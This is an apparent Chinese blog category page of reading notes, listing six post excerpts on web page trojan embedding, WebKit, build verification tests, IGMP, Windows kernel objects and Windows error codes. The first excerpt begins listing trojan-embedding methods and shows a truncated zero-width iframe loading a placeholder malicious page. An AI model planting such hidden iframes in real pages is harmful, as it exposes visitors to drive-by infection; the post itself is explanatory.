随笔分类 -  读书笔记

 
网页挂马方式和如何分析?
摘要:前篇简单了解了网页挂马和钓鱼的概念和表现,今儿详细看看网页如何挂马,我们如何使用工具分析。  我们知道网页挂马,是在网页文件中插入恶意代码,用户访问被挂马网页时,如果系统没有更新恶意代码利用的漏洞补丁,则会执行恶意程序,执行盗号等危险动作。那么常见的挂马方式有哪些呢? 一、常见挂马方式 1、框架挂马<iframesrc=http://www.xxx.com/muma.htmwidth=0he... 阅读全文
posted @ 2010-02-22 18:58 久月 阅读(1802) 评论(0) 推荐(0)
了解webkit
摘要:WebKit 的前身是 KDE 小组的 KHTML。Apple将 KHTML 发扬光大,推出了装备 KHTML 改进型的 WebKit 引擎的浏览器 Safari,获得了非常好的反响。   WebKit 引擎比 Gecko 引擎更受程序员欢迎的原因,除了其引擎的高效稳定,兼容性好外,其源码结构清晰,易于维护,是一个重要的原因。而 Gecko 的可维护性就差多了。   现在浏览器的内核引擎,基本... 阅读全文
posted @ 2010-02-19 16:48 久月 阅读(477) 评论(0) 推荐(0)
BVT测试应该做什么?
摘要:what Tests Belong in the BVTs?   BVTs or Build Verification Tests are standard Microsoft parlance for the tests we run every day to ensure that we didn’t break anything important with our checki... 阅读全文
posted @ 2009-10-23 19:42 久月 阅读(1850) 评论(0) 推荐(0)
我不知道的IGMP
摘要:我看到了不踏实的自己,我看到了不满足的自己,我看到了永远胡思乱想的自己,我看到了自卑的自己,我看到了不快乐的自己。我讨厌这样的自己。 无论生活还是工作,如果不能静下心来坦然去面对和经历,那么那样的我铁定是不快乐的,现在的我即如此,脑子里总是充斥着太多烦扰,是不是所有的教训都要经历惨痛才能不会再犯呢? 好吧,我用心学习,希望学习能少带给我一些烦恼。有一段时间没在这里更新,怎一个懒字了得。IGMP,T... 阅读全文
posted @ 2009-05-14 20:28 久月 阅读(1694) 评论(0) 推荐(0)
windows核心编程--内核对象和句柄泄漏
摘要:1. 什么是内核对象? 内核对象是操作系统分配的一个内存块,该内存块是一个数据结构,用于管理对象的各种信息。 当应用程序要与系统设备进行交互的时候,将使用到内核对象,出于安全的考虑,进程是不能直接访问内核对象的,操作系统提供了对应的函数来对它们进行访问。 存取符号对象、事件对象、文件对象、作业对象、互斥对象、管道对象、等待计时器对象等都是内核对象。我们在编程时经常要创建、打开和操作它... 阅读全文
posted @ 2009-03-09 20:56 久月 阅读(9046) 评论(3) 推荐(0)
windows核心编程--Windows错误码查看器
摘要:1、windows错误码 常常在测试过程中,会遇到程序出现错误或崩溃蓝屏时,提示错误代码但没有错误代码对应的文本描述,那么这些代码总会让你摸不着头脑。很多测试人员直接的做法就是把这个错误结果报告给开发人员了事。其实我们可以做一些简单的分析,或许能帮助开发人员尽早定位问题。 了解一下错误码的产生原因: 当调用一个Windows函数时,它首先要检验传递给它的的各个参数的有效性,... 阅读全文
posted @ 2009-03-02 18:28 久月 阅读(1359) 评论(2) 推荐(0)